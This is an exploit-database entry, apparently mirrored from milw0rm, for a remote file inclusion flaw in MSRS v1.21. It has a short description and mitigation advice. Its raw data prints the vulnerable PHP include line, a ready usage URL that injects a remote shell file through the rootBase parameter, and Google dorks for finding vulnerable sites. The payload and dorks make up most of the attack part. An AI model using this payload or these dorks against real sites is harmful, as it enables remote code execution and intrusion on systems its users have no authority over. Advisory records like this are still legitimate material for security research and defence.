header-logo
Suggest Exploit
vendor:
MSRS
by:
Unknown
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: MSRS
Affected Version From: v1.21
Affected Version To: v1.21
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MSRS v.1.21 Remote File Inclusion

The MSRS v.1.21 application is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by including a malicious file from a remote server. This can lead to remote code execution or unauthorized access to sensitive files on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or update to a version that is not affected by this vulnerability. Additionally, ensure that input validation is implemented to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

MSRS v.1.21 Remote File Inclusion

Author Site : http://www.myspacepros.com/

POC :

/_theme/breadcrumb.php Line No. 3

<?php include($rootBase . '/_inc/breadcrumb.php'); ?>

Usage : http://site.com/_theme/breadcrumb.php?rootBase=http://domain.com/shell.txt?

D0rks :

inurl:/Generators/Layout_Generator
"!new Female Celebrities"
inurl:/Generators/Scrollbar_Colors

# milw0rm.com [2007-10-29]

Navigation

Suggest Exploit

Services By CQR